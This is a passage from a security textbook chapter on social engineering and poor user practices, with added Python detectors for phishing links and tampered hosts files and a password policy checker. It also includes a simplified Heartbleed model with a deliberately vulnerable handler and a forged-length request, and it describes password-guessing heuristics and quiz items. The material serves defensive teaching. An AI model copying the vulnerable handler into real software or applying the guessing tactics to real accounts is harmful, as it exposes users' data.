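    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def host_of(text):
    """Hostname and parsed parts of a URL or bare hostname."""
    parts = urlsplit(text if "://" in text else "http://" + text)
    return (parts.hostname or "").lower(), parts


def is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def inspect_link(href, text):
    """Return the reasons this link is suspicious (empty list if none)."""
    reasons = []
    host, parts = host_of(href)
    if not host:
        return reasons
    if is_ip(host):
        reasons.append("link points at a raw IP address")
    if parts.username is not None:
        reasons.append("URL contains user@ before the real host")
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("internationalized (punycode) hostname")
    # Visible text that itself looks like a host or URL for a different site.
    text_host = ""
    if "." in text and " " not in text:
        text_host, _ = host_of(text)
    if text_host and "." in text_host.rstrip(".") and \
            registrable_domain(text_host) != registrable_domain(host):
        reasons.append(f"visible text says {text_host} but link goes to {host}")
    # Brand name buried in the host of a domain the brand does not own.
    for brand, real_domain in TRUSTED_BRANDS.items():
        if brand in host and registrable_domain(host) != real_domain:
            reasons.append(f"{brand!r} appears in host but domain is {registrable_domain(host)}")
    return reasons


def inspect_email(html_body):
    """Map each link target in the message to its list of reasons."""
    parser = LinkExtractor()
    parser.feed(html_body)
    return {href: inspect_link(href, text) for href, text in parser.links}


# Constructed sample message (documentation IP ranges, example.net domain).
SAMPLE = """
<p>Dear customer, your account has been compromised. Verify it now.</p>
<a href="http://www.paypal.com.account-verify.example.net/login">www.paypal.com</a>
<a href="http://198.51.100.23/ebay/signin">Verify your eBay account</a>
<a href="http://www.ebay.com@203.0.113.9/">http://www.ebay.com/</a>
<a href="https://www.paypal.com/">PayPal Help Center</a>
"""

if __name__ == "__main__":
    for href, reasons in inspect_email(SAMPLE).items():
        print(href, "->", reasons or "no obvious clues")
```

Only the last link in the sample survives inspection; the first three each trip at least one of the checks, which is the point of the exercise: none of them requires understanding the message, only reading the address bar carefully.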
A recent development has been the introduction of a modification to the original phishing attack. Spear phishing is the term that has been created to refer to the special targeting of groups with something in common when launching a phishing attack. By targeting specific groups, the ratio of successful attacks (that is, the number of responses received) to the total number of e-mails or messages sent usually increases because a targeted attack will seem more plausible than a message sent to users randomly.

Another specialized version of phishing is closely related to spear phishing. Again, specific individuals are targeted, but in this case the individuals are important individuals high up in an organization such as the corporate officers. The goal is to go after these "bigger targets," and thus the term that is used to refer to this form of attack is whaling.

Pharming consists of misdirecting users to fake websites made to look official. Using phishing, individuals are targeted one by one by sending out e-mails. To become a victim, the recipient must take an action (for example, respond by providing personal information). In pharming, the user will be directed to the fake website as a result of activity such as DNS poisoning (an attack that inserts false name-to-address records into a DNS server's cache, so that a correctly typed name resolves to the attacker's server) or modification of the local hosts file, which maps hostnames to IP addresses and is consulted before DNS. Once at the fake site, the user may supply personal information, believing that they are connected to the legitimate site.
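Of the two pharming routes just described, the hosts-file one leaves evidence on the victim's own machine and is easy to audit. The following is an added example for this page, not code from the book: it parses a hosts file and reports mappings that override a watched domain (the organization's bank, its own web properties) or that pin any other public name to a non-loopback address, while leaving the ordinary localhost lines and 0.0.0.0 ad-blocking sinkholes alone. The hosts-file contents and the watched domain are constructed for the example.

```python
"""Scan a hosts file for entries that could redirect users to a fake site."""
import ipaddress

# Names a workstation legitimately pins in its hosts file.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost",
               "ip6-localhost", "ip6-loopback", "ip6-allnodes", "ip6-allrouters"}


def parse_hosts(text):
    """Yield (address, hostname) for every mapping; comments are stripped and a
    line with several names yields one pair per name."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        for name in fields[1:]:
            yield fields[0], name.lower().rstrip(".")


def suspicious_entries(text, watch_domains):
    """Return (address, name, reason) for mappings worth a second look.
    Loopback and unspecified (0.0.0.0) targets are treated as benign pins."""
    findings = []
    for addr_text, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(addr_text)
        except ValueError:
            findings.append((addr_text, name, "malformed address"))
            continue
        if name in LOCAL_NAMES or addr.is_loopback or addr.is_unspecified:
            continue
        if any(name == d or name.endswith("." + d) for d in watch_domains):
            findings.append((addr_text, name, "watched domain overridden"))
        else:
            findings.append((addr_text, name, "name pinned to a non-loopback address"))
    return findings


# Constructed sample, not a real hosts file. 203.0.113.0/24 is documentation space.
SAMPLE_HOSTS = """\
127.0.0.1     localhost
::1           localhost ip6-localhost ip6-loopback
0.0.0.0       ads.example.org            # ad-blocking sinkhole, harmless
203.0.113.45  www.examplebank.com examplebank.com   # added by malware
10.0.0.5      intranet.corp.example      # legitimate corporate pin, still reported
"""

if __name__ == "__main__":
    for finding in suspicious_entries(SAMPLE_HOSTS, {"examplebank.com"}):
        print(finding)
```

On a real machine the file lives at /etc/hosts on Unix-like systems and at %SystemRoot%\System32\drivers\etc\hosts on Windows; read it and pass the contents to suspicious_entries. A legitimate corporate pin will be reported alongside the malicious one, which is intentional: the reviewer decides which entries belong, the tool only makes sure none is overlooked.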
Vishing

Vishing is a variation of phishing that uses voice communication technology to obtain the information the attacker is seeking. Vishing takes advantage of the trust that some people place in the telephone network. Users are unaware that attackers can spoof (simulate) calls from legitimate entities using Voice over IP (VoIP) technology. Voice messaging can also be compromised and used in these attempts. Generally, the attackers are hoping to obtain credit card numbers or other information that can be used in identity theft. The user may receive an e-mail asking him or her to call a number that is answered by a potentially compromised voice message system. Users may also receive a recorded message that appears to come from a legitimate entity. In both cases, the user will be encouraged to respond quickly and provide the sensitive information so that access to their account is not blocked. If a user ever receives a message that claims to be from a reputable entity and asks for sensitive information, the user should not provide it but instead should use the Internet or examine a legitimate account statement to find a phone number that can be used to contact the entity. The user can then verify that the message received was legitimate or report the vishing attempt.

Tech Tip

Beware of Vishing

Vishing (phishing conducted using voice systems) is generally successful because of the trust that individuals place in the telephone system. With caller ID, people believe they can identify who it is that is calling them. They do not understand that, just like many protocols in the TCP/IP protocol suite, caller ID can be spoofed.
SPAM

Though not generally considered a social engineering issue, nor a security issue for that matter, SPAM can, however, be a security concern. SPAM, as just about everybody knows, is bulk unsolicited e-mail. It can be legitimate in the sense that it has been sent by a company advertising a product or service, but it can also be malicious and could include an attachment that contains malicious software designed to harm your system, or a link to a malicious website that may attempt to obtain personal information from you. Though not as well known, a variation on SPAM is SPIM, which is basically SPAM delivered via an instant messaging application such as Yahoo! Messenger or AIM. The purpose of hostile SPIM is the same as that of SPAM—the delivery of malicious content or links.
Shoulder Surfing

Shoulder surfing does not necessarily involve direct contact with the target, but instead involves the attacker directly observing the individual entering sensitive information on a form, keypad, or keyboard. The attacker may simply look over the shoulder of the user at work, for example, or may set up a camera or use binoculars to view the user entering sensitive data. The attacker can attempt to obtain information such as a personal identification number (PIN) at an automated teller machine (ATM), an access control entry code at a secure gate or door, or a calling card or credit card number. Many locations now use a small shield to surround a keypad so that it is difficult to observe somebody entering information. More sophisticated systems can actually scramble the location of the numbers so that the top row at one time includes the numbers 1, 2, and 3 and the next time 4, 8, and 0. While this makes it a bit slower for the user to enter information, it thwarts an attacker's attempt to observe what numbers are pressed and enter the same buttons/pattern, since the location of the numbers constantly changes.

A related, somewhat obvious security precaution is that a person should not use the same PIN for all of their different accounts, gate codes, and so on, since an attacker who learns the PIN for one type of access could then use it for all of the other types of access.

Although methods such as adding shields to block the view or having the pad "scramble" the numbers can help make shoulder surfing more difficult, the best defense is for users to be aware of their surroundings and to not allow individuals to get into a position from which they can observe what the user is entering.

The attacker may attempt to increase the chance of successfully observing the target entering the data by starting a conversation with the target. This provides an excuse for the attacker to be physically closer to the target. Otherwise, the target may be suspicious if the attacker is standing too close. In this sense, shoulder surfing can be considered a social engineering attack.
Reverse Social Engineering

A slightly different approach to social engineering is called reverse social engineering. In this technique, the attacker hopes to convince the target to initiate the contact. This obviously differs from the traditional approach, where the target is the one that is contacted. The reason this attack may be successful is that, since the target is the one initiating the contact, attackers may not have to convince the target of their authenticity. The tricky part of this attack is, of course, convincing the target to make that initial contact. Possible methods to accomplish this might include sending out a spoofed e-mail (fake e-mail designed to appear authentic) that claims to be from a reputable source and provides another e-mail address or phone number to call for "tech support," or posting a notice or creating a bogus website for a legitimate company that also claims to provide "tech support." This may be especially successful if timed to coincide with a company's deployment of a new software or hardware platform. Another potential time to target an organization with this sort of attack is when there is a significant change in the organization itself, such as when two companies merge or a smaller company is acquired by a larger one. During these times, employees are not familiar with the new organization or its procedures, and amidst the confusion, it is easy to conduct either a social engineering or reverse social engineering attack.

Tech Tip

Be Aware of Reverse Social Engineering

Reverse social engineering is not nearly as widely understood as social engineering and is a bit trickier to execute. If the attacker is successful in convincing an individual to make the initial contact, however, the process of convincing them of the authenticity of the attacker is generally much easier than in a social engineering attack.

Hoaxes

At first glance, it might seem that a hoax related to security would be considered a nuisance and not a real security issue. This might be the case for some hoaxes, especially those of the urban legend type, but the reality of the situation is that a hoax can be very damaging if it causes users to take some sort of action that weakens security. One real hoax, for example, described a new, highly destructive piece of malicious software. It instructed users to check for the existence of a certain file and to delete it if the file was found. In reality, the file mentioned was an important file used by the operating system, and deleting it caused problems the next time the system was booted. The damage caused by users modifying security settings can be serious. As with other forms of social engineering, training and awareness are the best and first line of defense for both users and administrators. Users should be trained to be suspicious of unusual e-mails and stories and should know who to contact in the organization to verify their validity if they are received. Hoaxes often also advise the user to send it to their friends so they know about the issue as well—and by doing so, they help spread the hoax. Users need to be suspicious of any e-mail telling them to "spread the word."
Poor Security Practices

A significant portion of human-created security problems results from poor security practices. These poor practices may be those of an individual user who is not following established security policies or processes, or they may be caused by a lack of security policies, procedures, or training within the user's organization.

Password Selection

For many years, computer intruders have relied on users' poor selection of passwords to help the intruders in their attempts to gain unauthorized access to a system or network. If attackers could obtain a list of the users' names, chances were good they could eventually access the system. Users tend to pick passwords that are easy for them to remember, and what easier password could there be than the same sequence of characters that they use for their user ID? If a system has an account with the username jdoe, an attacker's reasonable first guess of the account's password would be jdoe. If this doesn't work, the attacker would try variations on the same, such as doej, johndoe, johnd, and eodj, all of which would be reasonable possibilities.

Poor password selection is one of the most common of poor security practices, and one of the most dangerous. Numerous studies that have been conducted on password selection have found that, while overall more users are learning to select good passwords, a significant percentage of users still make poor choices. The problem with this, of course, is that a poor password choice can enable an attacker to compromise a computer system or network more easily. Even when users have good passwords, they often resort to another poor security practice—writing the password down in an easily located place, which can also lead to system compromise if an attacker gains physical access to the area.

If the attacker's attempt to use variations on the username does not yield the correct password, they might simply need more information. Users also frequently pick names of family members, pets, or a favorite sports team. If the user lives in San Antonio, Texas, for example, a possible password might be gospursgo in honor of the city's professional basketball team. If these attempts don't work for the attacker, then the attacker might next try hobbies of the user, the name of the user's favorite make or model of car, or similar pieces of information. The key is that the user often picks something easy for them to remember, which means that the more the attacker knows about the user, the better the chance of discovering the user's password.

In an attempt to complicate the attacker's job, organizations have encouraged their users to mix upper- and lowercase characters and to include numbers and special characters in their password. While this does make the password harder to guess, the basic problem still remains: users will pick something that is easy for them to remember. Thus, our user in San Antonio may select the password G0*Spurs*G0, capitalizing three of the letters, inserting a special character twice, and substituting the number zero for the letter O. This makes the password harder to crack, but there are a finite number of variations on the basic gospursgo password, so, while the attacker's job has been made more difficult, it is still possible to guess the password. Password-cracking tools apply exactly these substitutions automatically as "mangling rules," so a short list of base words covers every such variant.

Organizations have also instituted additional policies and rules relating to password selection to further complicate an attacker's efforts. Organizations, for example, may require users to frequently change their password. This means that if an attacker is able to guess a password, it is only valid for a limited period of time before a new password is selected, after which the attacker is locked out. All is not lost for the attacker, however, since, again, users will select passwords they can remember. For example, password changes often result in a new password that simply incorporates a number at the end of the old one. Thus, our San Antonio user might select G0*Spurs*G1 as the new password, in which case the benefit of forcing password changes on a periodic, or even frequent, basis has been totally lost. It is a good bet that the next password chosen will be G0*Spurs*G2, followed by G0*Spurs*G3, and so forth.
Tech Tip

Heartbleed Vulnerability

In 2014, a vulnerability in the OpenSSL cryptographic library was discovered and given the name Heartbleed because it originated in the library's handling of the TLS heartbeat extension. This vulnerability resulted in the potential loss of passwords and other sensitive data across multiple platforms and up to a million web servers and related systems. Heartbleed leaked arbitrary contents of server memory: a single malformed heartbeat request could read back up to 64 KB of whatever happened to sit next to the request in the process. Among the items that may be lost in Heartbleed attacks are user credentials, user IDs, and passwords, and in some cases the server's private TLS key. The discovery of this vulnerability prompted users to change a massive number of passwords across the Web, as users had no knowledge as to the status of their credentials. One of the common pieces of advice to users was to not reuse passwords between systems. This advice is universally good advice, not just for Heartbleed, but for all systems, all the time.
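The defect behind Heartbleed (CVE-2014-0160) was a missing bounds check: the server trusted the payload length written in the heartbeat message instead of the length of the message it had actually received. The following is an added example for this page, not OpenSSL's code and not code from the book; it is a simplified Python model of the message format and of the handler before and after the fix. The "adjacent memory" is a constructed stand-in for whatever sat next to the request in the server process.

```python
"""Simplified model of the OpenSSL heartbeat bug (Heartbleed, CVE-2014-0160)."""
import struct

HB_REQUEST = 1        # heartbeat_request message type
PADDING_LEN = 16      # minimum padding that must follow the payload
HEADER_LEN = 3        # type (1 byte) + payload_length (2 bytes)


def build_heartbeat(payload, claimed_len=None):
    """Encode a heartbeat message: type | payload_length | payload | padding.
    A well-behaved peer sets claimed_len == len(payload); an attacker lies."""
    claimed = len(payload) if claimed_len is None else claimed_len
    return struct.pack("!BH", HB_REQUEST, claimed) + payload + b"\x00" * PADDING_LEN


def vulnerable_handler(record, adjacent_memory):
    """Pre-fix logic: trusts payload_length and copies that many bytes starting
    at the payload. The record sits in a buffer next to other data, so an
    over-long claim reads whatever follows it (modelled by adjacent_memory)."""
    _, claimed = struct.unpack("!BH", record[:HEADER_LEN])
    buffer = record + adjacent_memory
    return buffer[HEADER_LEN:HEADER_LEN + claimed]   # echoed back to the peer


def fixed_handler(record, adjacent_memory):
    """Post-fix logic: discards any heartbeat whose declared payload plus the
    mandatory padding does not fit inside the record that actually arrived."""
    if len(record) < HEADER_LEN + PADDING_LEN:
        return None
    _, claimed = struct.unpack("!BH", record[:HEADER_LEN])
    if HEADER_LEN + claimed + PADDING_LEN > len(record):
        return None   # silently dropped, as the patched code does
    return record[HEADER_LEN:HEADER_LEN + claimed]


# Constructed stand-in for data that happened to sit next to the record in the
# server process (another user's session). Not real data.
ADJACENT_MEMORY = b"user=jdoe password=G0*Spurs*G1 session=7f3a9c02 cart=3 items ..."

if __name__ == "__main__":
    honest = build_heartbeat(b"ping")
    print(vulnerable_handler(honest, ADJACENT_MEMORY), fixed_handler(honest, ADJACENT_MEMORY))
    evil = build_heartbeat(b"hi", claimed_len=60)   # a real attack could claim up to 65535
    print(vulnerable_handler(evil, ADJACENT_MEMORY))  # leaks the neighbouring session data
    print(fixed_handler(evil, ADJACENT_MEMORY))       # None: request discarded
```

Both handlers treat an honest request identically, which is why the bug shipped unnoticed; only a deliberately inconsistent length field tells them apart. The lesson generalizes beyond OpenSSL: a length that arrives inside a message is attacker-controlled input and must be checked against the number of bytes actually received before it is used to copy anything.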
Another policy or rule governing password selection often adopted by organizations is that passwords must not be written down. This, of course, is difficult to enforce, and thus users will frequently write them down, often as a result of what is referred to as the “password dilemma.” The more difficult we make it for attackers to guess our passwords, and the more frequently we force password changes, the more difficult the passwords are for authorized users to remember and the more likely they are to write them down. Writing them down and putting them in a secure place is one thing, but all too often users will write them on a slip of paper and keep them in their calendar, wallet, or purse. Most security consultants generally agree that if they are given physical access to an office, they will be able to find a password somewhere—the top drawer of a desk, inside of a desk calendar, attached to the underside of the keyboard, or even simply on a yellow “sticky note” attached to the monitor. With the proliferation of computers, networks, and users, the password dilemma has gotten worse. Today, the average Internet user probably has at least a half dozen different accounts and passwords to remember. Selecting a different password for each account, following the guidelines mentioned previously regarding character selection and frequency of changes, only aggravates the problem of remembering the passwords. This results in users all too frequently using the same password for all accounts. If a user does this, and then one of the accounts is broken, all other accounts are subsequently also vulnerable to attack.
Know the rules for good password selection. Generally, these are to use eight or more characters in your password, include a combination of upper- and lowercase letters, include at least one number and one special character, do not use a common word, phrase, or name, and choose a password that you can remember so that you do not need to write it down.
The need for good password selection and the protection of passwords also applies to another common feature of today’s electronic world, PINs. Most people have at least one PIN associated with things such as their ATM card or a security code to gain physical access to a room. Again, users will invariably select numbers that are easy to remember. Specific numbers, such as the individual’s birth date, their spouse’s birth date, or the date of some other significant event, are all common numbers to select. Other people will pick patterns that are easy to remember—2580, for example, uses all of the center numbers on a standard numeric pad on a telephone. Attackers know this, and guessing PINs follows the same sort of process that guessing a password does. Password selection is an individual activity, and ensuring that individuals are making good selections is the realm of the entity’s password policy. To ensure users make appropriate choices, they need to be aware of the issue and their personal role in securing accounts. An effective password policy conveys both the user role and responsibility associated with password usage and does so in a simple enough manner that it can be conveyed via screen notes during mandated password change events.
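The password rules above, and the "old password with the number bumped" change pattern described earlier, as a policy check. This is an added example, not code from the book; the COMMON_WORDS list is a constructed stand-in for a real dictionary and the function names are my own.

```python
"""Password policy check for the rules in this chapter: eight or more
characters, upper- and lowercase letters, a number, a special character,
no common word or name, and no "old password plus an incremented trailing
number" change such as G0*Spurs*G1 becoming G0*Spurs*G2."""

import re
from typing import List, Optional

MIN_LENGTH = 8

# Constructed banned-word list: common words, names, local teams. A real
# policy would load a large dictionary plus organization-specific terms.
COMMON_WORDS = {"password", "welcome", "letmein", "qwerty", "spurs", "sanantonio"}

# Undo the usual digit/symbol-for-letter swaps so "Sp0rt$" still reads "sports".
_LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                       "5": "s", "7": "t", "$": "s", "@": "a"})


def _letters_only(pw: str) -> str:
    """Lowercase, reverse leet substitutions, and drop everything but a-z."""
    return re.sub(r"[^a-z]", "", pw.lower().translate(_LEET))


def is_trivial_change(old: str, new: str) -> bool:
    """True when `new` is `old` with only its trailing digits changed."""
    def strip_digits(s: str) -> str:
        return re.sub(r"\d+$", "", s)
    return old != new and strip_digits(old) == strip_digits(new)


def check_password(candidate: str, previous: Optional[str] = None) -> List[str]:
    """Return the policy violations for `candidate`; an empty list means it passes."""
    problems: List[str] = []
    if len(candidate) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not (re.search(r"[a-z]", candidate) and re.search(r"[A-Z]", candidate)):
        problems.append("needs both upper- and lowercase letters")
    if not re.search(r"\d", candidate):
        problems.append("needs at least one number")
    if not re.search(r"[^A-Za-z0-9]", candidate):
        problems.append("needs at least one special character")
    core = _letters_only(candidate)
    hits = sorted(w for w in COMMON_WORDS if w in core)
    if hits:
        problems.append(f"contains common word or name: {hits[0]}")
    if previous is not None and is_trivial_change(previous, candidate):
        problems.append("old password with only the trailing number changed")
    return problems


if __name__ == "__main__":
    # The chapter's San Antonio example: the dictionary word survives the
    # leet-speak disguise, and the "change" is no change at all.
    for old, new in [(None, "G0*Spurs*G1"), ("G0*Spurs*G1", "G0*Spurs*G2")]:
        print(new, "->", check_password(new, previous=old) or "OK")
```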
Shoulder Surfing
As discussed earlier, shoulder surfing does not involve direct contact with the user, but instead involves the attacker directly observing the target entering sensitive information on a form, keypad, or keyboard. The attacker may simply look over the shoulder of the user at work, watching as a coworker enters their password. Although defensive methods can help make shoulder surfing more difficult, the best defense is for a user to be aware of their surroundings and to not allow individuals to get into a position from which they can observe what the user is entering. A related security comment can be made at this point: a person should not use the same PIN for all of their different accounts, gate codes, and so on, since an attacker who learns the PIN for one could then use it for all the others.
Piggybacking
People are often in a hurry and will frequently not follow good physical security practices and procedures. Attackers know this and may attempt to exploit this characteristic in human behavior. Tailgating or piggybacking is the simple tactic of following closely behind a person who has just used their own access card or PIN to gain physical access to a room or building. An attacker can thus gain access to the facility without having to know the access code or having to acquire an access card. It is similar to shoulder surfing in that it relies on the attacker taking advantage of an authorized user not following security procedures. Frequently the attacker may even start a conversation with the target before reaching the door so that the user may be more comfortable with allowing the individual in without challenging them. In this sense piggybacking is related to social engineering attacks. Both the piggybacking and shoulder surfing attack techniques can be easily countered by using simple procedures to ensure nobody follows you too closely or is in a position to observe your actions. Both techniques rely on the poor security practices of an authorized user to be successful. A more sophisticated countermeasure to piggybacking is a “mantrap,” which utilizes two doors to gain access to the facility. The second door does not open until the first one is closed and is spaced close enough to the first that an enclosure is formed that only allows one individual through at a time.
Dumpster Diving
As mentioned earlier, attackers need a certain amount of information before launching their attack. One common place to find this information, if the attacker is in the vicinity of the target, is the target’s trash. The attacker might find little bits of information that could be useful for an attack. This process of going through a target’s trash in hopes of finding valuable information that might be used in a penetration attempt is known in the computer community as dumpster diving. The tactic is not, however, unique to the computer community; it has been used for many years by others, such as identity thieves, private investigators, and law enforcement personnel, to obtain information about an individual or organization. If the attackers are very lucky, and the target’s security procedures are very poor, they may actually find user IDs and passwords. As mentioned in the discussion on passwords, users sometimes write their password down. If, when the password is changed, they discard the paper the old password was written on without shredding it, the lucky dumpster diver can gain a valuable clue. Even if the attacker isn’t lucky enough to obtain a password directly, he undoubtedly will find employee names, from which it’s not hard to determine user IDs, as discussed earlier. Finally, the attacker may gather a variety of information that can be useful in a social engineering attack. In most locations, trash is no longer considered private property after it has been discarded (and even where dumpster diving is illegal, little enforcement occurs). An organization should have policies about discarding materials. Sensitive information should be shredded and the organization should consider securing the trash receptacle so that individuals can’t forage through it. People should also consider shredding personal or sensitive information that they wish to discard in their own trash. A reasonable quality shredder is inexpensive and well worth the price when compared with the potential loss that could occur as a result of identity theft.
Try This!
Diving into Your Dumpster
The amount of useful information that users throw away in unsecured trash receptacles often amazes security professionals. Hackers know that they can often find manuals, network diagrams, and even user IDs and passwords by rummaging through dumpsters. After coordinating this with your security office, try seeing what you can find that individuals in your organization have discarded (assuming that there is no shredding policy) by either going through your organization’s dumpsters or just through the office trash receptacles. What useful information did you find? Is there an obvious suggestion that you might make to enhance the security of your organization?
Installing Unauthorized Hardware and Software
Organizations should have a policy that restricts the ability of normal users to install software and new hardware on their systems. A common example is a user installing unauthorized communication software and a modem to allow them to connect to their machine at work via a modem from their home. Another common example is a user installing a wireless access point so that they can access the organization’s network from many different areas. In these examples, the user has set up a backdoor into the network, circumventing all the other security mechanisms in place. The term “rogue modem” or “rogue access point” may be used to describe these two cases. A backdoor is an avenue that can be used to access a system while circumventing normal security mechanisms and can often be used to install additional executable files that can lead to more ways to access the compromised system. Security professionals can use widely available tools to scan their own systems periodically for either of these rogue devices to ensure that users haven’t created a backdoor.
It has already been mentioned that gaining physical access to a computer system or network often guarantees an attacker success in penetrating the system or the network it is connected to. At the same time, there may be a number of individuals who have access to a facility but are not authorized to access the information the systems store and process. We become complacent to the access these individuals have because they often quietly go about their jobs so as to not draw attention to themselves and to minimize the impact on the operation of the organization. They may also be overlooked because their job does not impact the core function of the organization. A prime example of this is the custodial staff. Becoming complacent about these individuals and not paying attention to what they may have access to, however, could be a big mistake, and users should not believe that everybody who has physical access to the organization has the same level of concern for or interest in the welfare of the organization.
Another common example of unauthorized software that users install on their systems is games. Unfortunately, not all games come in shrink-wrapped packages. Numerous small games can be downloaded from the Internet. The problem with this is that users don’t always know where the software originally came from and what may be hidden inside it. Many individuals have unwittingly installed what seemed to be an innocuous game, only to have downloaded a piece of malicious code capable of many things, including opening a backdoor that allows attackers to connect to, and control, the system from across the Internet. Because of these potential hazards, many organizations do not allow their users to load software or install new hardware without the knowledge and assistance of administrators. Many organizations also screen, and occasionally intercept, e-mail messages with links or attachments that are sent to users. This helps prevent users from, say, unwittingly executing a hostile program that was sent as part of a worm or virus. Consequently, many organizations have their mail servers strip off executable attachments to e-mail so that users can’t accidentally cause a security problem.
Data Handling
Understanding the responsibilities of proper data handling associated with one’s job is an important training topic. Information can be deceptive in that it is not directly tangible, and people tend to develop bad habits around other job measures… at the expense of security. Employees require training in how to recognize the data classification and handling requirements of the data they are using, and they need to learn how to follow the proper handling processes. If certain data elements require special handling because of contracts, laws, or regulations, there is typically a training clause associated with this requirement. Personnel assigned to these tasks should be specifically trained with regard to the security requirements. The spirit of the training clause is you get what you train, and if security over specific data types is a requirement, then it should be trained. This same principle holds for corporate data-handling responsibilities; you get the behaviors you train and reward.
Physical Access by Non-Employees
As has been mentioned, if an attacker can gain physical access to a facility, chances are very good that the attacker can obtain enough information to penetrate computer systems and networks. Many organizations require employees to wear identification badges when at work. This is an easy method to quickly spot who has permission to have physical access to the organization and who does not. While this method is easy to implement and can be a significant deterrent to unauthorized individuals, it also requires that employees actively challenge individuals who are not wearing the required identification badge. This is one area where organizations fail. Combine an attacker who slips in by piggybacking off of an authorized individual and an environment where employees have not been encouraged to challenge individuals without appropriate credentials and you have a situation where you might as well not have any badges in the first place. Organizations also frequently become complacent when faced with what appears to be a legitimate reason to access the facility, such as when an individual shows up with a warm pizza claiming it was ordered by an employee. It has often been stated by security consultants that it is amazing what you can obtain access to with a pizza box or a vase of flowers.
Another aspect that must be considered is personnel who have legitimate access to a facility but also have intent to steal intellectual property or otherwise exploit the organization. Physical access provides an easy opportunity for individuals to look for the occasional piece of critical information carelessly left out. With the proliferation of devices such as cell phones with built-in cameras, an individual could easily photograph information without it being obvious to employees. Contractors, consultants, and partners frequently not only have physical access to the facility but may also have network access. Other individuals who typically have unrestricted access to the facility when no one is around are nighttime custodial crew members and security guards. Such positions are often contracted out. As a result, hackers have been known to take temporary custodial jobs simply to gain access to facilities.
Clean Desk Policies
Preventing access to information is also important in the work area. Firms with sensitive information should have a “clean desk policy” specifying that sensitive information must not be left unsecured in the work area when the worker is not present to act as custodian. Even leaving the desk area and going to the bathroom can leave information exposed and subject to compromise. The clean desk policy should identify and prohibit things that are not obvious upon first glance, such as passwords on sticky notes under keyboards and mouse pads or in unsecured desk drawers.
People as a Security Tool
An interesting paradox when speaking of social engineering attacks is that people are not only the biggest problem and security risk but also the best tool in defending against a social engineering attack. The first step a company should take to fight potential social engineering attacks is to create the policies and procedures that establish the roles and responsibilities for not only security administrators but for all users. What is it that management expects, security-wise, from all employees? What is it that the organization is trying to protect, and what mechanisms are important for that protection?
Per the 2014 Verizon Data Breach Investigation Report, introduced in Chapter 1, hacks were discovered more often by internal employees than by outsiders. This means that trained users can be an important part of a security plan.
Security Awareness
Probably the single most effective method to counter potential social engineering attacks, after establishment of the organization’s security goals and policies, is an active security awareness program. The extent of the training will vary depending on the organization’s environment and the level of threat, but initial employee training on social engineering at the time a person is hired is important, as well as periodic refresher training. An important element that should be stressed in training about social engineering is the type of information that the organization considers sensitive and which may be the target of a social engineering attack. There are undoubtedly signs that the organization could point to as indicative of an attacker attempting to gain access to sensitive corporate information. All employees should be aware of these indicators. The scope of information that an attacker may ask for is very large, and many questions attackers pose might also be legitimate in another context (asking for someone’s phone number, for example). Employees should be taught to be cautious about revealing personal information and should especially be alert for questions regarding account information, personally identifiable information, or passwords.
Try This!
Security Awareness Programs
A strong security education and awareness training program can go a long way toward reducing the chance that a social engineering attack will be successful. Awareness programs and campaigns, which might include seminars, videos, posters, newsletters, and similar materials, are also fairly easy to implement and not very costly. There is no reason for an organization to not have an awareness program in place. A lot of information and ideas are available on the Internet. See what you can find that might be usable for your organization that you can obtain at no charge from various organizations on the Internet. (Tip: Check organizations such as NIST and NSA, which have developed numerous security documents and guidelines.)
As a final note on user responsibilities, corporate security officers must cultivate an environment of trust in their office, as well as an understanding of the importance of security. If users feel that security personnel are only there to make their life difficult or to dredge up information that will result in an employee’s termination, the atmosphere will quickly turn adversarial and be transformed into an “us versus them” situation. Security personnel need the help of all users and should strive to cultivate a team environment in which users, when faced with a questionable situation, will not hesitate to call the security office. In situations like this, security offices should remember the old adage of “don’t shoot the messenger.”
Security Policy Training and Procedures
People in an organization play a significant role in the security posture of the organization. As such, training is important as it can provide the basis for awareness of issues such as social engineering and desired employee security habits. These are detailed in Chapter 2.
Chapter 4 Review
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following regarding the role people can play in security.
Define basic terminology associated with social engineering
Social engineering is a technique in which the attacker uses various deceptive practices to convince the targeted person to divulge information they normally would not divulge, or to convince the target to do something they normally wouldn’t do.
In reverse social engineering, the attacker hopes to convince the target to initiate contact.
Describe steps organizations can take to improve their security
Organizations should have a policy that restricts the ability of normal users to install new software and hardware on their systems.
Contractors, consultants, and partners may frequently have not only physical access to the facility but also network access. Other groups that are given unrestricted, and unobserved, access to a facility are nighttime custodial crew members and security guards. Both are potential security problems and organizations should take steps to limit these individuals’ access.
The single most effective method to counter potential social engineering attacks, after establishing the organization’s security goals and policies, is an active security awareness program.
Describe common user actions that may put an organization’s information at risk
No matter how advanced security technology is, it will ultimately be deployed in an environment where the human element may be its greatest weakness.
Attackers know that employees are frequently very busy and don’t stop to think about security. They may attempt to exploit this work characteristic through piggybacking or shoulder surfing.
Recognize methods attackers may use to gain information about an organization
For many years computer intruders have relied on users’ poor selection of passwords to help the intruders in their attempts to gain unauthorized access to a system or network.
One common way to find useful information (if the attacker is in the vicinity of the target, such as a company office) is to go through the target’s trash looking for bits of information that could be useful to a penetration attempt.
Determine ways in which users can aid instead of detract from security
An interesting paradox of social engineering attacks is that people are not only the biggest problem and security risk but also the best line of defense against a social engineering attack.
A significant portion of employee-created security problems arise from poor security practices.
Users should always be on the watch for attempts by individuals to gain information about the organization and should report suspicious activity to their employer.
Recognize the role training and awareness plays in assisting the people side of security
Individual users can enhance security of a system through proper execution of their individual actions and responsibilities.
Training and awareness programs can reinforce user knowledge of desired actions.
Key Terms
backdoor, dumpster diving, phishing, piggybacking, reverse social engineering, shoulder surfing, social engineering, SPAM, tailgating, vishing
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.
1. A _______________ is an avenue that can be used to access a system while circumventing normal security mechanisms.
2. _______________ is a procedure in which attackers position themselves in such a way as to be able to observe an authorized user entering the correct access code.
